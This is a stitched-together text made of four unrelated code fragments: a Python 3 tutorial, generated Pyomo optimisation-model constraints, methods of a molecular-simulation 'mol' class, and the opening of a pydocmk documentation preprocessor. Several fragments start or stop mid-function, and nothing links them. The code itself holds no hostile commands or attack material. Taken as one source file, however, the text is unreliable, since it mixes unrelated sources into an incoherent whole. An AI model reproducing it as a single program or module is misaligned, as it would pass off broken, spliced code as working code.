print("I'm Python. Nice to meet you!") # => I'm Python. Nice to meet you!
# By default the print function also prints out a newline at the end.
# Use the optional argument end to change the end string.
print("Hello, World", end="!") # => Hello, World!
# Simple way to get user input data from console
input_string_var = input("Enter some data: ") # Returns the data as a string
# Note: In earlier versions of Python, the input() method was named raw_input()
####################################################
## 1. Primitive Datatypes and Operators
####################################################
# Math is what you would expect
1 + 1 # => 2
8 - 1 # => 7
10 * 2 # => 20
35 / 5 # => 7.0
# Integer division rounds down for both positive and negative numbers.
5 // 3 # => 1
-5 // 3 # => -2
5.0 // 3.0 # => 1.0 # works on floats too
-5.0 // 3.0 # => -2.0
# The result of division is always a float
10.0 / 3 # => 3.3333333333333335
# Modulo operation
7 % 3 # => 1
# Exponentiation (x**y, x to the yth power)
2**3 # => 8
# Enforce precedence with parentheses
1 + 3 * 2 # => 7
(1 + 3) * 2 # => 8
# Round numbers manually with round()
round(5.5) # => 6
round(5.758, 2) # => 5.76
# Work in other bases (binary, octal and hexadecimal)
0b10 # => 2
0o10 # => 8
0x10 # => 16
# Scientific notation is also accepted
2.99e8
1.65e-30
# Using underscores, you can make large numbers more legible
10000000 == 10_000_000 # => True
# Boolean values are primitives (Note: the capitalization)
True # => True
False # => False
# negate with not
not True # => False
not False # => True
# Boolean Operators
# Note "and" and "or" are case-sensitive
True and False # => False
False or True # => True
# True and False are actually 1 and 0 but with different keywords
True + True # => 2
True * 8 # => 8
False - 5 # => -5
# Comparison operators look at the numerical value of True and False
0 == False # => True
1 == True # => True
2 == True # => False
-5 != False # => True
# Using boolean logical operators on ints casts them to booleans for evaluation, but their non-cast value is returned
# Don't mix up with bool(ints) and bitwise and/or (&,|)
bool(0) # => False
bool(0.0) # => False
bool(4) # => True
bool(-6) # => True
0 and 2 # => 0
-5 or 0 # => -5
# Equality is ==
1 == 1 # => True
2 == 1 # => False
# Inequality is !=
1 != 1 # => False
2 != 1 # => True
# More comparisons
1 < 10 # => True
1 > 10 # => False
2 <= 2 # => True
2 >= 2 # => True
# Seeing whether a value is in a range
1 < 2 and 2 < 3 # => True
2 < 3 and 3 < 2 # => False
# Chaining makes this look nicer
1 < 2 < 3 # => True
2 < 3 < 2 # => False
# (is vs. ==) is checks if two variables refer to the same object, but == checks
# if the objects pointed to have the same values.
a = [1, 2, 3, 4] # Point a at a new list, [1, 2, 3, 4]
b = a # Point b at what a is pointing to
b is a # => True, a and b refer to the same object
b == a # => True, a's and b's objects are equal
b = [1, 2, 3, 4] # Point b at a new list, [1, 2, 3, 4]
b is a # => False, a and b do not refer to the same object
b == a # => True, a's and b's objects are equal
# Strings are created with " or '. There is no 'char' type unlike in other languages
"This is a string."
'This is also a string.'
# Strings can be added too! But try not to do this.
"Hello " + "world!" # => "Hello world!"
# String literals (but not variables) can be concatenated without using '+'
"Hello " "world!" # => "Hello world!"
# A string can be treated like a list of characters
"Hello world!"[0] # => 'H'
# You can find the length of a string
len("This is a string") # => 16
# You can split strings based on a delimiter, by default, space
"This string".split()
# You can also format using f-strings or formatted string literals (in Python 3.6+)
name = "Reiko"
f"She said her name is {name}." # => "She said her name is Reiko."
# You can basically put any Python statement inside the braces and it will be output in the string.
f"{name} is {len(name)} characters long." # => "Reiko is 5 characters long."
number = 250_000_000
f"{number:,}" # => 250,000,000
# And raw strings too
path = r"C:\Users\Documents" # => Prints it as is
# Bytes are a thing, usually used when working with raw binary data
data = b"some binaty data"
# Python allows encoding and decoding of said data into strings and viceversa
string_1 = "Hey, thís is ä string with Ùnicode charactêrs"
bytes_1 = string_1.encode("utf-8") # => b'Hey, th\xc3\xads is \xc3\xa4 string with \xc3\x99nicode charact\xc3\xaars'
bytes_1.decode("utf-8") # => Hey, thís is ä string with Ùnicode charactêrs
# 'None' is an object too
None # => None
# Don't use the equality "==" symbol to compare objects to None
# Use "is" instead. This checks for equality of object identity.
"etc" is None # => False
None is None # => True
# None, 0, and empty strings/lists/dicts/tuples all evaluate to False.
# All other values are True
bool(0) # => False
bool("") # => False
bool("False") # => True
bool([]) # => False
bool({}) # => False
bool(()) # => False
# Casting is available through constructors
int(-2.5) # => -2
int("340")
float(2)
float("2467")
str(450)
# And you can even get infinity
float("inf")
float("-inf")
####################################################
## 2. Variables and Collections
####################################################
# There are no declarations, only assignments. A new object is created
# on every assignment, but x = 300, x = 5, x = 300 will have created 2
# separate int objects. Technically, variables in Python are actually
# references to objects
some_var = 5
some_var # => 5
# Accessing a previously unassigned variable is an exception.
# See Control Flow to learn more about exception handling.
some_unknown_var # Raises a NameError
# if can be used as an expression
# Equivalent of C's '?:' ternary operator
"yahoo!" if 3 > 2 else 2 # => "yahoo!"
# Un-pythonic alternative, usually best to avoid it
(value_if_false, value_if_true)[test]
# Lists store sequences
li = []
# You can start | |
= Constraint(expr= m.x49 - m.x286 - m.x289 == 0)
# Splitter balances x62..x64 and big-M on/off bounds tied to binaries b611..b613
# (generated model code; M values are the variables' upper bounds).
m.c215 = Constraint(expr= m.x62 - m.x314 - m.x320 == 0)
m.c216 = Constraint(expr= m.x63 - m.x315 - m.x321 == 0)
m.c217 = Constraint(expr= m.x64 - m.x316 - m.x322 == 0)
m.c218 = Constraint(expr= m.x284 - 3.34221486003388*m.b611 <= 0)
m.c219 = Constraint(expr= m.x285 - 3.34221486003388*m.b612 <= 0)
m.c220 = Constraint(expr= m.x286 - 3.34221486003388*m.b613 <= 0)
m.c221 = Constraint(expr= m.x287 + 3.34221486003388*m.b611 <= 3.34221486003388)
m.c222 = Constraint(expr= m.x288 + 3.34221486003388*m.b612 <= 3.34221486003388)
m.c223 = Constraint(expr= m.x289 + 3.34221486003388*m.b613 <= 3.34221486003388)
m.c224 = Constraint(expr= m.x314 - 1.83548069293539*m.b611 <= 0)
m.c225 = Constraint(expr= m.x315 - 1.83548069293539*m.b612 <= 0)
m.c226 = Constraint(expr= m.x316 - 1.83548069293539*m.b613 <= 0)
m.c227 = Constraint(expr= m.x320 + 1.83548069293539*m.b611 <= 1.83548069293539)
m.c228 = Constraint(expr= m.x321 + 1.83548069293539*m.b612 <= 1.83548069293539)
m.c229 = Constraint(expr= m.x322 + 1.83548069293539*m.b613 <= 1.83548069293539)
# Disjunct b614..b616: y = 0.9*log(1+x) performance constraint (smoothed with the
# 0.001 + 0.999*b term to stay defined when the unit is off), zero-flow
# constraints for the inactive branch, stream balances, and big-M bounds.
m.c230 = Constraint(expr=(m.x326/(0.001 + 0.999*m.b614) - 0.9*log(1 + m.x290/(0.001 + 0.999*m.b614)))*(0.001 + 0.999*
m.b614) <= 0)
m.c231 = Constraint(expr=(m.x327/(0.001 + 0.999*m.b615) - 0.9*log(1 + m.x291/(0.001 + 0.999*m.b615)))*(0.001 + 0.999*
m.b615) <= 0)
m.c232 = Constraint(expr=(m.x328/(0.001 + 0.999*m.b616) - 0.9*log(1 + m.x292/(0.001 + 0.999*m.b616)))*(0.001 + 0.999*
m.b616) <= 0)
m.c233 = Constraint(expr= m.x293 == 0)
m.c234 = Constraint(expr= m.x294 == 0)
m.c235 = Constraint(expr= m.x295 == 0)
m.c236 = Constraint(expr= m.x332 == 0)
m.c237 = Constraint(expr= m.x333 == 0)
m.c238 = Constraint(expr= m.x334 == 0)
m.c239 = Constraint(expr= m.x50 - m.x290 - m.x293 == 0)
m.c240 = Constraint(expr= m.x51 - m.x291 - m.x294 == 0)
m.c241 = Constraint(expr= m.x52 - m.x292 - m.x295 == 0)
m.c242 = Constraint(expr= m.x65 - m.x326 - m.x332 == 0)
m.c243 = Constraint(expr= m.x66 - m.x327 - m.x333 == 0)
m.c244 = Constraint(expr= m.x67 - m.x328 - m.x334 == 0)
m.c245 = Constraint(expr= m.x290 - 3.34221486003388*m.b614 <= 0)
m.c246 = Constraint(expr= m.x291 - 3.34221486003388*m.b615 <= 0)
m.c247 = Constraint(expr= m.x292 - 3.34221486003388*m.b616 <= 0)
m.c248 = Constraint(expr= m.x293 + 3.34221486003388*m.b614 <= 3.34221486003388)
m.c249 = Constraint(expr= m.x294 + 3.34221486003388*m.b615 <= 3.34221486003388)
m.c250 = Constraint(expr= m.x295 + 3.34221486003388*m.b616 <= 3.34221486003388)
m.c251 = Constraint(expr= m.x326 - 1.32154609891348*m.b614 <= 0)
m.c252 = Constraint(expr= m.x327 - 1.32154609891348*m.b615 <= 0)
m.c253 = Constraint(expr= m.x328 - 1.32154609891348*m.b616 <= 0)
m.c254 = Constraint(expr= m.x332 + 1.32154609891348*m.b614 <= 1.32154609891348)
m.c255 = Constraint(expr= m.x333 + 1.32154609891348*m.b615 <= 1.32154609891348)
m.c256 = Constraint(expr= m.x334 + 1.32154609891348*m.b616 <= 1.32154609891348)
# Disjunct b617..b619: y = log(1+x) performance constraint (same smoothing
# pattern as above), inactive-branch zeros, balances, and big-M bounds.
m.c257 = Constraint(expr=(m.x338/(0.001 + 0.999*m.b617) - log(1 + m.x269/(0.001 + 0.999*m.b617)))*(0.001 + 0.999*m.b617)
<= 0)
m.c258 = Constraint(expr=(m.x339/(0.001 + 0.999*m.b618) - log(1 + m.x270/(0.001 + 0.999*m.b618)))*(0.001 + 0.999*m.b618)
<= 0)
m.c259 = Constraint(expr=(m.x340/(0.001 + 0.999*m.b619) - log(1 + m.x271/(0.001 + 0.999*m.b619)))*(0.001 + 0.999*m.b619)
<= 0)
m.c260 = Constraint(expr= m.x275 == 0)
m.c261 = Constraint(expr= m.x276 == 0)
m.c262 = Constraint(expr= m.x277 == 0)
m.c263 = Constraint(expr= m.x341 == 0)
m.c264 = Constraint(expr= m.x342 == 0)
m.c265 = Constraint(expr= m.x343 == 0)
m.c266 = Constraint(expr= m.x41 - m.x269 - m.x275 == 0)
m.c267 = Constraint(expr= m.x42 - m.x270 - m.x276 == 0)
m.c268 = Constraint(expr= m.x43 - m.x271 - m.x277 == 0)
m.c269 = Constraint(expr= m.x68 - m.x338 - m.x341 == 0)
m.c270 = Constraint(expr= m.x69 - m.x339 - m.x342 == 0)
m.c271 = Constraint(expr= m.x70 - m.x340 - m.x343 == 0)
m.c272 = Constraint(expr= m.x269 - 2.54515263975353*m.b617 <= 0)
m.c273 = Constraint(expr= m.x270 - 2.54515263975353*m.b618 <= 0)
m.c274 = Constraint(expr= m.x271 - 2.54515263975353*m.b619 <= 0)
m.c275 = Constraint(expr= m.x275 + 2.54515263975353*m.b617 <= 2.54515263975353)
m.c276 = Constraint(expr= m.x276 + 2.54515263975353*m.b618 <= 2.54515263975353)
m.c277 = Constraint(expr= m.x277 + 2.54515263975353*m.b619 <= 2.54515263975353)
m.c278 = Constraint(expr= m.x338 - 1.26558121681553*m.b617 <= 0)
m.c279 = Constraint(expr= m.x339 - 1.26558121681553*m.b618 <= 0)
m.c280 = Constraint(expr= m.x340 - 1.26558121681553*m.b619 <= 0)
m.c281 = Constraint(expr= m.x341 + 1.26558121681553*m.b617 <= 1.26558121681553)
m.c282 = Constraint(expr= m.x342 + 1.26558121681553*m.b618 <= 1.26558121681553)
m.c283 = Constraint(expr= m.x343 + 1.26558121681553*m.b619 <= 1.26558121681553)
# Disjunct b620..b622: linear unit with fixed yield (out = 0.9 * in),
# inactive-branch zeros, balances, and big-M bounds (M = 15 in, 13.5 out).
m.c284 = Constraint(expr= - 0.9*m.x296 + m.x344 == 0)
m.c285 = Constraint(expr= - 0.9*m.x297 + m.x345 == 0)
m.c286 = Constraint(expr= - 0.9*m.x298 + m.x346 == 0)
m.c287 = Constraint(expr= m.x299 == 0)
m.c288 = Constraint(expr= m.x300 == 0)
m.c289 = Constraint(expr= m.x301 == 0)
m.c290 = Constraint(expr= m.x347 == 0)
m.c291 = Constraint(expr= m.x348 == 0)
m.c292 = Constraint(expr= m.x349 == 0)
m.c293 = Constraint(expr= m.x53 - m.x296 - m.x299 == 0)
m.c294 = Constraint(expr= m.x54 - m.x297 - m.x300 == 0)
m.c295 = Constraint(expr= m.x55 - m.x298 - m.x301 == 0)
m.c296 = Constraint(expr= m.x71 - m.x344 - m.x347 == 0)
m.c297 = Constraint(expr= m.x72 - m.x345 - m.x348 == 0)
m.c298 = Constraint(expr= m.x73 - m.x346 - m.x349 == 0)
m.c299 = Constraint(expr= m.x296 - 15*m.b620 <= 0)
m.c300 = Constraint(expr= m.x297 - 15*m.b621 <= 0)
m.c301 = Constraint(expr= m.x298 - 15*m.b622 <= 0)
m.c302 = Constraint(expr= m.x299 + 15*m.b620 <= 15)
m.c303 = Constraint(expr= m.x300 + 15*m.b621 <= 15)
m.c304 = Constraint(expr= m.x301 + 15*m.b622 <= 15)
m.c305 = Constraint(expr= m.x344 - 13.5*m.b620 <= 0)
m.c306 = Constraint(expr= m.x345 - 13.5*m.b621 <= 0)
m.c307 = Constraint(expr= m.x346 - 13.5*m.b622 <= 0)
m.c308 = Constraint(expr= m.x347 + 13.5*m.b620 <= 13.5)
m.c309 = Constraint(expr= m.x348 + 13.5*m.b621 <= 13.5)
m.c310 = Constraint(expr= m.x349 + 13.5*m.b622 <= 13.5)
# Disjunct b623..b625: linear unit with fixed yield (out = 0.6 * in),
# inactive-branch zeros, balances, and big-M bounds (M = 15 in, 9 out).
m.c311 = Constraint(expr= - 0.6*m.x302 + m.x350 == 0)
m.c312 = Constraint(expr= - 0.6*m.x303 + m.x351 == 0)
m.c313 = Constraint(expr= - 0.6*m.x304 + m.x352 == 0)
m.c314 = Constraint(expr= m.x305 == 0)
m.c315 = Constraint(expr= m.x306 == 0)
m.c316 = Constraint(expr= m.x307 == 0)
m.c317 = Constraint(expr= m.x353 == 0)
m.c318 = Constraint(expr= m.x354 == 0)
m.c319 = Constraint(expr= m.x355 == 0)
m.c320 = Constraint(expr= m.x56 - m.x302 - m.x305 == 0)
m.c321 = Constraint(expr= m.x57 - m.x303 - m.x306 == 0)
m.c322 = Constraint(expr= m.x58 - m.x304 - m.x307 == 0)
m.c323 = Constraint(expr= m.x74 - m.x350 - m.x353 == 0)
m.c324 = Constraint(expr= m.x75 - m.x351 - m.x354 == 0)
m.c325 = Constraint(expr= m.x76 - m.x352 - m.x355 == 0)
m.c326 = Constraint(expr= m.x302 - 15*m.b623 <= 0)
m.c327 = Constraint(expr= m.x303 - 15*m.b624 <= 0)
m.c328 = Constraint(expr= m.x304 - 15*m.b625 <= 0)
m.c329 = Constraint(expr= m.x305 + 15*m.b623 <= 15)
m.c330 = Constraint(expr= m.x306 + 15*m.b624 <= 15)
m.c331 = Constraint(expr= m.x307 + 15*m.b625 <= 15)
m.c332 = Constraint(expr= m.x350 - 9*m.b623 <= 0)
m.c333 = Constraint(expr= m.x351 - 9*m.b624 <= 0)
m.c334 = Constraint(expr= m.x352 - 9*m.b625 <= 0)
m.c335 = Constraint(expr= m.x353 + 9*m.b623 <= 9)
m.c336 = Constraint(expr= m.x354 + 9*m.b624 <= 9)
m.c337 = Constraint(expr= m.x355 + 9*m.b625 <= 9)
# Disjunct b626..b628: y = 1.1*log(1+x) performance constraint (same smoothing
# pattern), inactive-branch zeros, balances, and big-M bounds.
m.c338 = Constraint(expr=(m.x356/(0.001 + 0.999*m.b626) - 1.1*log(1 + m.x308/(0.001 + 0.999*m.b626)))*(0.001 + 0.999*
m.b626) <= 0)
m.c339 = Constraint(expr=(m.x357/(0.001 + 0.999*m.b627) - 1.1*log(1 + m.x309/(0.001 + 0.999*m.b627)))*(0.001 + 0.999*
m.b627) <= 0)
m.c340 = Constraint(expr=(m.x358/(0.001 + 0.999*m.b628) - 1.1*log(1 + m.x310/(0.001 + 0.999*m.b628)))*(0.001 + 0.999*
m.b628) <= 0)
m.c341 = Constraint(expr= m.x311 == 0)
m.c342 = Constraint(expr= m.x312 == 0)
m.c343 = Constraint(expr= m.x313 == 0)
m.c344 = Constraint(expr= m.x359 == 0)
m.c345 = Constraint(expr= m.x360 == 0)
m.c346 = Constraint(expr= m.x361 == 0)
m.c347 = Constraint(expr= m.x59 - m.x308 - m.x311 == 0)
m.c348 = Constraint(expr= m.x60 - m.x309 - m.x312 == 0)
m.c349 = Constraint(expr= m.x61 - m.x310 - m.x313 == 0)
m.c350 = Constraint(expr= m.x77 - m.x356 - m.x359 == 0)
m.c351 = Constraint(expr= m.x78 - m.x357 - m.x360 == 0)
m.c352 = Constraint(expr= m.x79 - m.x358 - m.x361 == 0)
m.c353 = Constraint(expr= m.x308 - 15*m.b626 <= 0)
m.c354 = Constraint(expr= m.x309 - 15*m.b627 <= 0)
m.c355 = Constraint(expr= m.x310 - 15*m.b628 <= 0)
m.c356 = Constraint(expr= m.x311 + 15*m.b626 <= 15)
m.c357 = Constraint(expr= m.x312 + 15*m.b627 <= 15)
m.c358 = Constraint(expr= m.x313 + 15*m.b628 <= 15)
m.c359 = Constraint(expr= m.x356 - 3.04984759446376*m.b626 <= 0)
m.c360 = Constraint(expr= m.x357 - 3.04984759446376*m.b627 <= 0)
m.c361 = Constraint(expr= m.x358 - 3.04984759446376*m.b628 <= 0)
m.c362 = Constraint(expr= m.x359 + 3.04984759446376*m.b626 <= 3.04984759446376)
m.c363 = Constraint(expr= m.x360 + 3.04984759446376*m.b627 <= 3.04984759446376)
m.c364 = Constraint(expr= m.x361 + 3.04984759446376*m.b628 <= 3.04984759446376)
# Next disjunct: linear unit (out = 0.9 * in) with a second coupled feed
# (x374..x376 equal the same outputs x416..x418), inactive-branch zeros,
# and stream balances.
m.c365 = Constraint(expr= - 0.9*m.x317 + m.x416 == 0)
m.c366 = Constraint(expr= - 0.9*m.x318 + m.x417 == 0)
m.c367 = Constraint(expr= - 0.9*m.x319 + m.x418 == 0)
m.c368 = Constraint(expr= - m.x374 + m.x416 == 0)
m.c369 = Constraint(expr= - m.x375 + m.x417 == 0)
m.c370 = Constraint(expr= - m.x376 + m.x418 == 0)
m.c371 = Constraint(expr= m.x323 == 0)
m.c372 = Constraint(expr= m.x324 == 0)
m.c373 = Constraint(expr= m.x325 == 0)
m.c374 = Constraint(expr= m.x377 == 0)
m.c375 = Constraint(expr= m.x378 == 0)
m.c376 = Constraint(expr= m.x379 == 0)
m.c377 = Constraint(expr= m.x419 == 0)
m.c378 = Constraint(expr= m.x420 == 0)
m.c379 = Constraint(expr= m.x421 == 0)
m.c380 = Constraint(expr= m.x62 - m.x317 - m.x323 == 0)
m.c381 = Constraint(expr= m.x63 - m.x318 - m.x324 == 0)
m.c382 = Constraint(expr= m.x64 - m.x319 - m.x325 == 0)
m.c383 = Constraint(expr= m.x86 - m.x374 - m.x377 == 0)
m.c384 = Constraint(expr= m.x87 - m.x375 - m.x378 == 0)
m.c385 = Constraint(expr= | |
of the periodic site.
###
elems.append(site.species.elements[0].name.lower())
fracs.append([site.frac_coords[0],site.frac_coords[1], site.frac_coords[2]])
fracs = np.array(fracs)
m.natoms=len(elems)
m.set_elems(elems)
m.set_atypes(elems)
m.set_cell(cell)
m.set_xyz_from_frac(fracs)
m.set_nofrags()
m.set_empty_conn()
m.detect_conn()
return m
@classmethod
def from_ff(cls, basename, fit=False):
    """Construct a mol object from files and attach its force-field addon.

    Parameters:
        basename : base name of the structure / force-field files to read
        fit : passed through to the force-field reader (default False)
    """
    mol = cls()
    mol.read(basename)
    mol.addon("ff")
    mol.ff.read(basename, fit=fit)
    return mol
@classmethod
def from_array(cls, arr, **kwargs):
    """Generic reader for the mol class, reading coordinates from a Nx3 array.

    Parameters:
        arr : the array to be read
        **kwargs : all options of the parser are passed by the kwargs
            see molsys.io.* for detailed info
    """
    mol = cls()
    logger.info("reading array")
    # the second axis must hold exactly x, y, z
    assert arr.shape[1] == 3, "Wrong array dimension (second must be 3): %s" % (arr.shape,)
    formats.read['array'](mol, arr, **kwargs)
    return mol
@classmethod
def from_nested_list(cls, nestl, **kwargs):
    """Generic reader for the mol class, reading from a nested list of Nx3 coordinates.

    Parameters:
        nestl : nested list (N entries, each of length 3) to be read
        **kwargs : all options of the parser are passed by the kwargs
            see molsys.io.* for detailed info
    """
    logger.info("reading nested lists")
    for nl in nestl:
        # fail early with a message naming the offending entry
        # (was "%s" % (arr.shape,), which raised NameError before arr existed)
        assert len(nl) == 3, "Wrong nested list length (must be 3): %s" % (nl,)
    arr = np.array(nestl)
    # delegate to the array reader (was cls.fromArray, which does not exist)
    return cls.from_array(arr, **kwargs)
@classmethod
def from_cp2k_restart(cls, restart, **kwargs):
''' reads and parses a cp2k restart file
Parameters:
restart : restart filename
**kwargs : all options of the parser are passed by the kwargs
see molsys.io.* for detailed info'''
f = open(restart)
txt = f.read()
# coords
xyz_str = [x for x in txt.split('&COORD',1)[-1].rsplit('&END COORD',1)[0].split('\n') if x.strip() != '']
elems = [x.split()[0] for x in xyz_str]
coords = np.array([[float(y) for i,y in enumerate(x.split()) if i != 0] for x in xyz_str])
cell = np.array([[float(y) for y in x.split()[1:]] for x in txt.split('&CELL\n',1)[-1].split('&END CELL\n')[0].split('\n')[0:3]])
m = cls.from_array(coords)
m.cp2ktxt = txt
m.natoms = len(coords)
m.set_xyz(coords)
m.set_cell(cell,cell_only=True)
m.elems = elems
m.set_nofrags()
m.detect_conn()
m.atypes = elems
return m
    @classmethod
    def from_systrekey(cls, skey, **kwargs):
        """generate a mol/topo object from a systrekey as the barycentric embedding

        it is necessary to have graph_tool installed in order to run lqg

        Args:
            skey (string): the systrekey

        Returns:
            mol instance flagged as a topology (is_topo/use_pconn set)
        """
        from .util.lqg import lqg
        l = lqg()
        l.read_systre_key(skey)
        # calling the lqg instance performs the embedding (cell, frac coords, edges)
        l()
        m = cls()
        m.natoms = l.nvertices
        m.set_cell(l.cell)
        m.set_xyz_from_frac(l.frac_xyz)
        m.set_empty_conn()
        m.set_empty_pconn()
        # NOTE: conn and pconn are parallel lists -- each append to conn[v]
        # must be mirrored by an append to pconn[v]; the reverse edge gets
        # the negated periodic image label
        for i,e in enumerate(l.edges):
            m.conn[e[0]].append(e[1])
            m.conn[e[1]].append(e[0])
            m.pconn[e[0]].append(np.array(l.labels[i]))
            m.pconn[e[1]].append(-1*np.array(l.labels[i]))
        # TODO: set types properly
        m.set_atypes(l.nvertices*['1'])
        # element per vertex is chosen from the coordination number
        for i in range(m.natoms):
            e = elements.topotypes[len(m.conn[i])]
            m.elems.append(e)
        m.is_topo = True
        m.use_pconn = True
        return m
@classmethod
def from_mfp5(cls, fname, stage, traj=True):
"""generate mol object from mfp5 file
Args:
fname (string): name of mfp5 file
stage (string): stage name
traj (bool, optional): if a trajectory info is present load addon and set source. Defaults to True.
Returns:
molobejct: generated mol object
"""
from molsys.util import mfp5io
# instantiate the imfp5io reader
pio = mfp5io.mfp5io(fname, restart=stage, filemode="r")
# get the mol obejct from the mfp5 file
m = pio.get_mol_from_system()
pio.close()
if traj:
m.addon("traj", source="mfp5", fname=fname, stage=stage)
return m
def to_phonopy(self, hessian = None):
"""
Method to create a phonopy object for lattice dynamic calculations.
Kwargs:
hessian (numpy.ndarray, optional): Defaults to None. Hessian matrix of
shape (3N,3N) in kcal/mol/A**2.
Raises:
ImportError: Raises Import Error when phonopy is not installed
Returns:
[Phonopy]: Return the phonopy object.
"""
try:
from phonopy import Phonopy
from phonopy.structure.atoms import PhonopyAtoms
from phonopy.units import ElkToTHz
except:
raise ImportError("Phonopy is not available!")
assert self.periodic == True; "Requested system is not periodic!"
unitcell = PhonopyAtoms(symbols = [i.title() for i in self.get_elems()],
cell = self.get_cell(), scaled_positions = self.get_frac_from_xyz())
# phonopy is setup by assuming atomic units for the hessian matrix
phonon = Phonopy(unitcell, [[1,0,0],[0,1,0],[0,0,1]], factor = ElkToTHz)
if hessian is not None:
# we convert here the hessian to the phonopy format and to atomic units
hessian *= kcalmol/angstrom**2
h2 = np.zeros((self.natoms,self.natoms,3,3), dtype = "double")
for i in range(self.natoms):
for j in range(self.natoms):
i3,j3 = 3*i, 3*j
h2[i,j,:,:]=hessian[i3:i3+3, j3:j3+3]
phonon.set_force_constants(h2)
return phonon
def write(self, fname, ftype=None, rank=None, **kwargs):
''' generic writer for the mol class
Parameters:
fname : the filename to be written
ftype="mfpx" : the parser type that is used to writen the file
rank : deault: None, if not None but integer write if rank = 0 (e.g. we use partitions, then rank is partition rank)
**kwargs : all options of the parser are passed by the kwargs
see molsys.io.* for detailed info'''
if rank is not None:
# if rank is given return only when rank is not zero (mpi_rank can be nonzero!)
if rank != 0:
return
else:
# otherise use mpi_rank
if self.mpi_rank != 0:
return
if ftype is None:
fsplit = fname.rsplit('.',1)[-1]
if fsplit != fname: #there is an extension
ftype = fsplit #ftype is inferred from extension
else: #there is no extension
ftype = 'mfpx' #default
logger.info("writing file "+str(fname)+' in '+str(ftype)+' format')
if ftype in formats.write:
with open(fname,"w") as f:
formats.write[ftype](self,f,**kwargs)
else:
logger.error("unsupported format: %s" % ftype)
raise IOError("Unsupported format")
return
def to_string(self, ftype='mfpx', **kwargs):
"""
Method to output mol object as string in the format
of the given filetype.
Kwargs:
ftype(string): name of the filetype, default to mfpx
Raises:
IOError
Returns:
string: mol object as string
"""
f = StringIO()
logger.info("writing string as %s" % str(ftype))
if ftype in formats.write:
formats.write[ftype](self,f,**kwargs)
else:
logger.error("unsupported format: %s" % ftype)
raise IOError("Unsupported format")
return f.getvalue()
def to_fileobject(self,f, ftype ="mfpx", **kwargs):
logger.info("writing string as %s" % str(ftype))
if ftype in formats.write:
formats.write[ftype](self,f,**kwargs)
else:
logger.error("unsupported format: %s" % ftype)
raise IOError("Unsupported format")
return f
def view(self, ftype='txyz', program=None, opts=(), **kwargs):
''' launch graphics visualisation tool, i.e. moldenx.
Debugging purpose.'''
if self.mpi_rank == 0:
logger.info("invoking %s as visualisation tool" % (program,))
pid = str(os.getpid())
_tmpfname = "_tmpfname_%s.%s" % (pid, ftype)
self.write(_tmpfname, ftype=ftype, **kwargs)
if program is None:
program = "moldenx"
if opts == () and program == "moldenx":
opts = ('-a', '-l', '-S', '-hoff', '-geom', '1080x1080')
try:
ret = subprocess.call([program, _tmpfname] + list(opts))
except KeyboardInterrupt:
pass
finally:
try:
os.remove(_tmpfname)
logger.info("temporary file "+_tmpfname+" removed")
except:
logger.warning("temporary file "+_tmpfname+" removed during view!")
return
def molden(self, opts=(), **kwargs):
if opts == ():
opts = ('-a', '-l', '-S', '-hoff', '-geom', '1080x1080')
if self.mpi_rank == 0:
self.view(ftype='txyz', program='moldenx', opts=opts, **kwargs)
def pymol(self, opts=(), **kwargs):
if self.mpi_rank == 0:
self.view(ftype='txyz', program='pymol', opts=opts, **kwargs)
##### addons ####################################################################################
    def addon(self, addmod, *args, **kwargs):
        """
        Add an addon module to this object.

        The addon becomes an instance of the addon class and is available as
        an attribute of the mol instance (self.<addmod>). Loading is skipped
        when the addon is already present.

        Args:
            addmod (string): name of the addon module
            *args : positional arguments for the addon constructor
            **kwargs : keyword arguments for the addon constructor

        Returns:
            bool: True when the addon was (newly) loaded, False otherwise
        """
        # already loaded -> warn and refuse to load twice
        if addmod in self.loaded_addons:
            logger.warning("\"%s\" addon is already available as attribute of mol instance!" % addmod)
            loaded = False
            return loaded
        if addmod in addon.__all__: ### addon is enabled: try to set it
            addclass = getattr(addon, addmod, None)
            if addclass is not None: ### no error raised during addon/__init__.py import
                if inspect.isclass(addclass):
                    ### get the addon attribute, initialize it and set as self attribute
                    addinst = addclass(self, *args, **kwargs)
                    setattr(self, addmod, addinst)
                    loaded = True ### the addon is now available as self.addmod
                elif inspect.ismodule(addclass):
                    ### to enable syntax: 'from molsys.addon.addmod import addmod'
                    # in this case, e.g.: addon.ff is the MODULE, not the CLASS, so that we need TWICE
                    # the 'getattr' to get molsys.addon.ff.ff
                    addclass = getattr(addclass, addmod)
                    addinst = addclass(self, *args, **kwargs)
                    setattr(self, addmod, addinst)
                    loaded = True ### the addon is now available as self.addmod
                else:
                    # NOTE(review): no exception is active in this branch, so
                    # traceback.print_exc()/sys.exc_info() likely print nothing
                    # useful -- confirm the intended error reporting here
                    import traceback
                    traceback.print_exc()
                    logger.error("\"%s\" addon is not available: %s" % (addmod, sys.exc_info()[1]) )
                    loaded = False
            else: ### error raised during addon/__init__.py import
                print(addon._errortrace[addmod])
                logger.error("\"%s\" addon is not imported: check addon module" % addmod)
                loaded = False
        else: ### addon in unknown or disabled in addon.__all__
            logger.error("\"%s\" addon is unknown/disabled: check addon.__all__ in addon module" % addmod)
            loaded = False
        if loaded:
            ### addmod added to loaded_addons (to prevent further adding)
            logger.info("\"%s\" addon is now available as attribute of mol instance" % addmod)
            self.loaded_addons.append(addmod)
        #assert addmod in self.loaded_addons, "%s not available" % addmod ### KEEP for testing
        return loaded
| |
# -*- coding: utf-8 -*-
# Copyright (c) 2020 <NAME>
# Copyright (c) 2020 Phryk
# Copyright (c) 2001 <NAME>
# This file is licensed under
# The Python Software Foundation License Version 2
# https://github.com/python/cpython/blob/2.7/LICENSE
"""
pydocmk preprocessor
"""
import __builtin__
import os
import re
import sys
import string
import codecs
import collections
import inspect
import pkgutil
import pydoc
import jinja2
from markdown import Markdown
# Markdown extensions to enable on the module-level renderer below.
extra_extensions = []
# if 'markdown.extensions.codehilite' in extra_extensions:
#     import markdown.extensions.codehilite
#     extra_extensions.pop(extra_extensions.index(
#         'markdown.extensions.codehilite'))
#     extra_extensions.append(
#         markdown.extensions.codehilite.CodeHiliteExtension(linenums=False))
# Shared Markdown renderer used by the preprocessor.
# NOTE(review): 'xhtml5' is a legacy output name in python-markdown --
# confirm it is still accepted by the pinned markdown version.
md = Markdown(
    output_format='xhtml5',
    extensions=extra_extensions
)
def clean(text):
    """HTML-escape angle brackets, mainly for cleaning `Repr` output."""
    # fixed: the escape entities were lost in the source (the replacements
    # were no-ops replacing '<' with '<'); '<'/'>' must become the HTML
    # entities so repr text cannot break the generated markup
    return text.replace('<', '&lt;').replace('>', '&gt;')
class MarkdownRepr(pydoc.TextRepr, object):
    """Text repr whose output is passed through ``clean`` (angle-bracket
